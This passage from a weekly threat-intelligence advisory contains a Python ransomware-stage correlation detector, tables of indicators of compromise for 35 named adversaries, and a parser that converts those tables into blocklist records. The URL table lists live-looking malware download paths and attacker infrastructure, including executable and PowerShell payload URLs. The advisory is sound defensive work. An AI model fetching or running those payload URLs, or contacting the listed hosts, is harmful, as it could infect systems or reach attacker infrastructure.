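    A host is scored by how many consecutive chain stages, starting from the
    first one, appear in order within `window` of the first matched stage.
    Out-of-order events never advance the cursor.
    """
    by_host = defaultdict(list)
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        ts, host, rule = parse_event(line)
        by_host[host].append((ts, rule))

    alerts = {}
    for host, events in sorted(by_host.items()):
        events.sort()
        stage, start, matched = 0, None, []
        for ts, rule in events:
            if start is not None and ts - start > window:
                break  # chain went stale; score only what was seen in-window
            if stage < len(chain) and rule == chain[stage]:
                start = start or ts
                matched.append((rule, ts.isoformat()))
                stage += 1
        # One stage on its own is noise (an RMM install by itself is normal);
        # two or more in order on one host inside the window earns a ticket.
        if stage >= 2:
            alerts[host] = {"severity": SEVERITY[stage], "stages": matched}
    return alerts


# Constructed events. srv-fs01 runs the full chain; ws-0311 is a legitimate
# helpdesk RMM install followed by unrelated SaaS traffic; ws-0522 gets the
# first two stages and then an encryption event far outside the window.
SAMPLE_EVENTS = """
# timestamp            host       rule
2026-05-12T08:02:11    srv-fs01   implant_msi
2026-05-12T08:04:40    srv-fs01   saas_c2_beacon
2026-05-12T08:30:05    srv-fs01   rmm_install
2026-05-13T02:15:00    srv-fs01   mass_encrypt
2026-05-12T09:00:00    ws-0311    rmm_install
2026-05-12T09:10:00    ws-0311    saas_c2_beacon
2026-05-14T11:00:00    ws-0522    implant_msi
2026-05-14T11:20:00    ws-0522    saas_c2_beacon
2026-05-19T11:20:00    ws-0522    mass_encrypt
"""

if __name__ == "__main__":
    for host, alert in correlate(SAMPLE_EVENTS.splitlines()).items():
        print(host, alert["severity"], [s for s, _ in alert["stages"]])
```

srv-fs01 comes out critical with all four stages, ws-0522 medium with two, and ws-0311 is silent. The medium tier is where the value is: two stages in order means the implant and its C2 are present before the operator has moved to hands-on-keyboard, which is the window in which containment is cheap.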

Full Weekly IOC Summary — All 35 Unique Adversaries

Adversary                        Type                 IP  Domain  Hash  URL  Total  Severity
-------------------------------  -----------------  ----  ------  ----  ---  -----  --------
Coruna                           Malware               2      93     2    2     99  High
TencShell                        Malware               3       1    51    0     55  High
CVE-2026-41940 (cPanel)          SCAN                  0       3    48    0     51  Low
Hologram                         Malware               8      17    12   10     47  High
Kong RAT                         Malware               3       9    18   11     41  High
EtherRAT                         Malware               0       6    18   11     35  High
CallPhantom                      Malware Campaign      2       4    28    0     34  High
The Gentlemen                    Ransomware            0       0    33    0     33  High
FrostyNeighbor                   Threat Actor          0       8    13    0     21  High
Seedworm                         Threat Actor          6       0     9    5     20  High
Open-OSS/privacy-filter          Malware Campaign      1       3     4    8     16  High
GemStuffer                       Malware Campaign      0       6     6    3     15  High
Fake TronLink Chrome Extension   Phishing Campaign     0       2     5    7     14  Low
STX RAT                          Malware Campaign      0       0     6    2      8  High
OPERATION SILENTCANVAS           Malware Campaign      1       1     6    0      8  High
PySoxy                           Malware Campaign      4       3     0    0      7  High
BlobPhish                        Malware               6       1     0    0      7  High
JDownloader                      Malware Campaign      0       0     7    0      7  High
TrickMo                          Malware               0       0     6    0      6  High
Smoke Loader                     Malware               0       0     6    0      6  High
Lazarus                          Threat Actor          0       1     1    3      5  High
FamousSparrow                    Threat Actor          0       2     0    2      4  High
Tofsee                           Malware               0       0     3    1      4  High
GCleaner                         Malware               0       0     3    0      3  High
DarkComet                        C2                    0       0     3    0      3  Medium
KongTuke                         Malware Campaign      0       0     3    0      3  High
TeamPCP                          Malware               0       0     3    0      3  High
CNCF project Antrea              Malware Campaign      1       0     0    2      3  High
ShinyHunters                     Threat Actor          1       0     0    2      3  High
Macsync                          Malware               0       0     0    1      1  High
Venomrat                         Malware               0       0     0    1      1  High
Clickfix                         Malware Campaign      0       0     0    1      1  High
Donutloader                      Malware               0       0     0    1      1  High
Sectoprat                        C2                    0       0     0    1      1  Medium
Acrstealer                       Malware               0       0     0    1      1  High
-------------------------------  -----------------  ----  ------  ----  ---  -----  --------
Total (35 adversaries)                                38     160   294   75    567

The complete dataset is available on request via the contact page — we make this intelligence available to qualified SOC and CERT teams free of charge.

Top 20 Indicators Per Type — Unique to This Week

Ranking combines severity (High over Medium over Low) and ML-derived confidence score, breaking ties by most-recent detection. All values shown are new; none appear in last week’s reporting. Before loading these into a block list, separate attacker-owned infrastructure from shared services that merely appear in the telemetry: blob.core.windows.net is the apex domain of Azure Blob Storage, ipinfo.io/json is a public geolocation API that implants and legitimate software alike call, and 104.21.48.205 and 172.67.156.47 (Cloudflare) and 13.107.213.38 and 13.107.246.38 (Microsoft) sit in shared cloud address space. Use those as hunt pivots (which hosts, which processes, which paths) and reserve blocking for the attacker-registered domains, the file hashes and the dedicated IPs.

Top 20 IP Addresses

IOC value          Adversary       Confidence
-----------------  --------------  ----------
179.43.177.220     Seedworm                97
178.128.233.36     Seedworm                97
172.67.156.47      Seedworm                97
104.21.48.205      Seedworm                97
37.187.78.41       Seedworm                97
34.117.59.81       Seedworm                97
91.215.85.103      ShinyHunters            97
107.191.58.76      BlobPhish               85
104.238.159.149    BlobPhish               85
96.9.125.147       BlobPhish               85
20.44.241.109      BlobPhish               85
13.107.246.38      BlobPhish               85
13.107.213.38      BlobPhish               85
172.238.175.209    Coruna                  85
185.236.228.33     Coruna                  85
188.114.97.3       Hologram                85
45.55.35.48        Hologram                85
193.202.84.14      Hologram                85
185.196.9.98       Hologram                85
91.92.242.30       Hologram                85

Top 20 Domains

IOC value                                                    Adversary        Confidence
-----------------------------------------------------------  ---------------  ----------
sentinelonepro.com                                           FamousSparrow            97
virusblocker.it.com                                          FamousSparrow            97
attachment-storage-asset-static.needbinding.icu              FrostyNeighbor           97
book-happy.needbinding.icu                                   FrostyNeighbor           97
nama-belakang.nebao.icu                                      FrostyNeighbor           97
easiestnewsfromourpointofview.algsat.icu                     FrostyNeighbor           97
mickeymousegamesdealer.alexavegas.icu                        FrostyNeighbor           97
hinesafar.sardk.icu                                          FrostyNeighbor           97
shinesafar.sardk.icu                                         FrostyNeighbor           97
best-seller.lavanille.buzz                                   FrostyNeighbor           97
precommit.vercel.app                                         Lazarus                  97
blob.core.windows.net                                        BlobPhish                85
dominonew.onaylarim.com                                      Coruna                   85
transcecly.com/                                              Coruna                   85
elitepeptides.de                                             Coruna                   85
oskac.et7y5vzgl.top                                          Coruna                   85
pick-your-gift.store                                         Coruna                   85
i.uuu.today                                                  Coruna                   85
iphone-status.online                                         Coruna                   85
info.datakontext.com/i/16BmNCfZ_lY66ILT3NGLO_JTxZdn_iZs      Coruna                   85

Top 20 File Hashes

IOC value (SHA-1 or SHA-256)                                      Adversary        Confidence
----------------------------------------------------------------  ---------------  ----------
776A43E46C36A539C916ED426745EE96E2392B39                          FrostyNeighbor           97
8D1F2A6DF51C7783F2EAF1A0FC0FF8D032E5B57F                          FrostyNeighbor           97
B65551D339AECE718EA1465BF3542C794C445EFC                          FrostyNeighbor           97
E15ABEE1CFDE8BE7D87C7C0B510450BAD6BC0906                          FrostyNeighbor           97
43E30BE82D82B24A6496F6943ECB6877E83F88AB                          FrostyNeighbor           97
4F2C1856325372B9B7769D00141DBC1A23BDDD14                          FrostyNeighbor           97
D89E5524E49199B1C3B66C524E7A63C3F0A0C199                          FrostyNeighbor           97
7E537D8E91668580A482BD77A5A4CABA26D6BDAC                          FrostyNeighbor           97
FA6882672AD3654800987613310D7C3FBADE027E                          FrostyNeighbor           97
3FA7D1B13542F1A9EB054111F9B69C250AF68643                          FrostyNeighbor           97
4E52C92709A918383E90534052AAA257ACE2780C                          FrostyNeighbor           97
6FDED427A16D5314BA3E1EB9AFD120DC84449769                          FrostyNeighbor           97
27FA11F6A1D653779974B6FB54DE4AF47F211232                          FrostyNeighbor           97
3ebd9bb57d155cc7c3353660f54c153a094cdfbd                          Lazarus                  97
e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b  Seedworm                 97
c6182fd01b14d84723e3c9d11bc0e16b34de6607ccb8334fc9bb97c1b44f0cde  Seedworm                 97
128b58a2a2f1df66c474094aacb7e50189025fbf45d7cd8e0834e93a8fbed667  Seedworm                 97
0c9b911935a3705b0ad569446804d80026feb6db3884aeb240b6c76e9b8cf139  Seedworm                 97
74ab3838ebed7054b2254bf7d334c80c8b2cfec4a97d1706723f8ea55f11061f  Seedworm                 97
3ee7dab4ae4f6d4f16dfabb6f38faef370411a9fc00ff035844e54703b99600a  Seedworm                 97

Top 20 URLs

IOC Value Adversary Confidence
https://virusblocker.it.com/12156011215601 FamousSparrow 97
https://virusblocker.it.com/11E6C6611E6C66 FamousSparrow 97
https://precommit.vercel.app/settings/mac?flag=5 Lazarus 97
https://precommit.vercel.app/settings/linux?flag=5 Lazarus 97
https://precommit.vercel.app/settings/windows?flag=5 Lazarus 97
http://179.43.177.220:8080/nm.ps1 Seedworm 97
http://179.43.177.220:8080/a.dat Seedworm 97
http://179.43.177.220:8080/a.exe Seedworm 97
http://ipinfo.io/json Seedworm 97
https://svc.wompworthy.com Seedworm 97
http://91.215.85.103/pay_or_leak/instructure_affected_schools_list.txt ShinyHunters 97
http://shinypogk4jjniry5qi7247tznop6mxdrdte2k6pdu5cyo43vdzmrwid.onion/ ShinyHunters 97
http://193.143.1.217/scheldt Acrstealer 85
http://5.230.201.146/files/admin/blueline.exe Donutloader 85
http://130.12.182.175:8080/21.exe Tofsee 85
https://solar-sanat.net/MDClient.exe Venomrat 85
http://briskinternet.com/dynamic?txd=fa90319c89e7a0272c859f9f1403c6c2f12793281d3a295ce283d6018d5dd1c3 Macsync 85
https://8df9.cc/api/ip-sync/sync Coruna 85
https://greatweeeeb.com/static/report.html Coruna 85
https://witch-skins-lip-coal.trycloudflare.com EtherRAT 85
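The four tables above are printed as whitespace-separated rows, which is convenient to read but not ready to load into a SIEM or EDR blocklist. The parser below is an added example written for this advisory, not tooling from HACKFORLAB or its platform. It turns rows of the form "value adversary confidence" into typed records (IPv4, domain, URL, SHA-1, SHA-256), and flags indicators that sit on shared services such as Azure Blob Storage, Vercel, Cloudflare quick tunnels and the ipinfo.io lookup API, where a domain-level block would also hit legitimate traffic and the indicator should be matched on the full URL or hostname instead. The list of shared-infrastructure suffixes and the sample rows (copied from the tables above) are this example's own assumptions.

```python
"""Parse the advisory's plain-text IOC tables into typed, SIEM-ready records.
Added example; not part of the HACKFORLAB advisory or platform."""
from __future__ import annotations

import ipaddress
import json
import re
from dataclasses import dataclass, asdict
from urllib.parse import urlsplit

HEX_HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}

# Assumption (not from the advisory): parent domains of shared services. A block on
# the registrable domain would also break legitimate traffic, so indicators under
# these suffixes should be matched on the exact hostname or full URL.
SHARED_INFRA_SUFFIXES = (
    "blob.core.windows.net",  # Azure Blob Storage
    "vercel.app",             # Vercel hosting
    "trycloudflare.com",      # Cloudflare quick tunnels
    "ipinfo.io",              # public IP geolocation API
)

# Constructed sample: one row of each kind, copied from the tables in the advisory.
SAMPLE_TABLE = """\
IOC Value Adversary Confidence
179.43.177.220 Seedworm 97
blob.core.windows.net BlobPhish 85
transcecly.com/ Coruna 85
3ebd9bb57d155cc7c3353660f54c153a094cdfbd Lazarus 97
e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b Seedworm 97
https://precommit.vercel.app/settings/mac?flag=5 Lazarus 97
http://ipinfo.io/json Seedworm 97
https://witch-skins-lip-coal.trycloudflare.com EtherRAT 85
"""


@dataclass
class Indicator:
    value: str          # indicator exactly as printed in the advisory
    ioc_type: str       # ipv4 | ipv6 | domain | url | md5 | sha1 | sha256 | unknown
    adversary: str
    confidence: int
    host: str = ""      # hostname for domain and URL indicators
    shared_infra: bool = False  # True: match on full value, never block the parent domain


def host_of(value: str) -> str:
    """Hostname of a bare domain, a schemeless host/path, or a full URL."""
    if "://" in value:
        return (urlsplit(value).hostname or "").lower()
    return value.split("/", 1)[0].split(":", 1)[0].lower()


def is_shared_infra(host: str) -> bool:
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in SHARED_INFRA_SUFFIXES)


def classify(value: str) -> str:
    """Infer the indicator type from its shape; hashes are checked before hosts."""
    v = value.strip()
    if re.fullmatch(r"[0-9a-fA-F]+", v) and len(v) in HEX_HASH_LENGTHS:
        return HEX_HASH_LENGTHS[len(v)]
    try:
        ipaddress.ip_address(v)
        return "ipv4" if "." in v else "ipv6"
    except ValueError:
        pass
    if "://" in v or "/" in v.rstrip("/"):
        return "url"  # full URL, or host with a path as in the Domains table
    if re.fullmatch(r"[a-z0-9.-]+\.[a-z]{2,}", v.rstrip("/").lower()):
        return "domain"
    return "unknown"


def parse_table(text: str) -> list[Indicator]:
    """Rows are 'value adversary... confidence'; header and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[-1].isdigit():
            continue
        value, adversary, confidence = parts[0], " ".join(parts[1:-1]), int(parts[-1])
        ioc_type = classify(value)
        host = host_of(value) if ioc_type in ("domain", "url") else ""
        records.append(Indicator(value, ioc_type, adversary, confidence, host,
                                 bool(host) and is_shared_infra(host)))
    return records


def summarize(records: list[Indicator]) -> dict:
    by_type: dict[str, int] = {}
    for r in records:
        by_type[r.ioc_type] = by_type.get(r.ioc_type, 0) + 1
    return {"by_type": by_type, "shared_infra": sum(r.shared_infra for r in records)}


if __name__ == "__main__":
    parsed = parse_table(SAMPLE_TABLE)
    print(json.dumps([asdict(r) for r in parsed], indent=2))
    print(summarize(parsed))
```

Feed the Domains, URLs, Hashes and IP tables through `parse_table` one at a time, then route records by `ioc_type` (hashes to the EDR, hosts and URLs to the proxy or NDR) and treat every record with `shared_infra` set as an exact-match rule only.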

Glossary — Terms Used in This Advisory

  • IOC (Indicator of Compromise): a piece of evidence — an IP, domain, file hash, URL, or email — that suggests a system has been compromised.
  • APT (Advanced Persistent Threat): a well-resourced, typically state-sponsored cyber-attack group that maintains long-term access to compromised environments.
  • RAT (Remote Access Trojan): malware that gives a remote operator interactive control over an infected machine — file transfer, command execution, screen capture, etc.
  • C2 / Command and Control: the infrastructure an attacker uses to communicate with their malware after it has infected a target.
  • Ransomware-as-a-Service (RaaS): a business model where a core team builds and operates the ransomware while affiliates carry out the actual intrusions in exchange for a share of the ransom.
  • MITRE ATT&CK: a globally-used knowledge base of adversary tactics and techniques. Each technique has an identifier like T1190. The current version is v15 of the Enterprise Matrix.
  • CVE (Common Vulnerabilities and Exposures): a unique identifier for a publicly-disclosed security vulnerability. Format: CVE-YYYY-NNNNN.
  • CVSS (Common Vulnerability Scoring System): a 0.0–10.0 score quantifying how severe a CVE is. 9.0+ is “critical.”
  • SOC (Security Operations Centre): the team responsible for detecting and responding to security incidents.
  • SIEM (Security Information and Event Management): the central platform a SOC uses to ingest, search, and alert on security telemetry.
  • EDR / NDR / XDR / SOAR: different classes of detection and response tooling, focused on endpoints (EDR), network (NDR), unified (XDR), and automation (SOAR).
  • IOC pipeline: the automated system that ingests, scores, and de-duplicates indicators from threat intelligence feeds.
  • Confidence score: a 0–100 value our ML pipeline assigns to each indicator based on source reliability, corroboration, and intrinsic indicator quality.
  • DLL Side-Loading (T1574.002): a technique where attackers place a malicious DLL alongside a legitimate signed binary so the legitimate binary loads it at runtime.
  • NTLM Relay: a Microsoft Windows authentication attack in which an intercepted NTLM authentication exchange is forwarded to another system so the attacker is authenticated there as the victim.
  • OWA / M365: Outlook Web Access and Microsoft 365 — common credential-theft targets.
  • RMM Tool: Remote Monitoring and Management software, including commercial remote-management and remote-access platforms, used legitimately by IT teams and frequently abused by adversaries.

HACKFORLAB Threat Hunt Intelligence Platform

Every adversary, indicator, and technique referenced in this advisory is operational right now on our hosted threat-hunting workbench. SOC, CERT, MSSP, and detection-engineering teams use the platform to pivot indicators against live telemetry, enrich on demand, query historical adversary attribution, and track campaign evolution week over week.

Sign in to start hunting: https://huntintel.hackforlab.com/login.html

Happy Threat Hunting

If this advisory sharpened your team’s posture this week, share it with your peers, subscribe to the feed, and send us your war stories — the sharper our reader signal, the sharper the next edition becomes. Stay paranoid. Stay patched. Happy threat hunting.

#threathunting #threatintelligence #cybersecurity #threatactor #malware #ransomware #phishing #threatadvisory #CTI #IOC #CyberThreatIntel #TTPs #OSINT #CyberDefense #weeklythreatbriefing #TheGentlemen #EtherRAT #FrostyNeighbor #Seedworm #FamousSparrow #Lazarus #Hologram #KongRAT #Coruna #BlobPhish #TrickMo #ShinyHunters #TencShell #cPanel #SupplyChainAttack #MITREATTACK #SOC #BlueTeam

Core Working Areas: Threat Intelligence, Digital Forensics, Incident Response, Fraud Investigation, Web Application Security

Technical Certifications: Computer Hacking Forensics Investigator | Certified Ethical Hacker | Certified Cybercrime Investigator | Certified Professional Hacker | Certified Professional Forensics Analyst | Red Hat Certified Engineer | Cisco Certified Network Associate | Certified Firewall Solutions | Certified Network Monitoring Solution | Certified Proxy Solutions
